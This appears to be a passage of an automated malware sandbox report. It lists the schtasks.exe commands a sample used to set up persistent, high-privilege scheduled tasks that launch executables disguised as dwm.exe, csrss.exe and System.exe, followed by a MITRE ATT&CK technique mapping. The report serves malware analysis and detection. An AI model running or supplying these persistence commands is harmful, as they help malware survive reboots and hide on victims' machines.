schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Default User\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:588

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Documents\My Music\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Default\Documents\My Music\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Documents\My Music\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1508

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2872

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2164

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Scripting

T1064

Persistence

Scheduled Task

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Install Root Certificate

T1130

Modify Registry

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery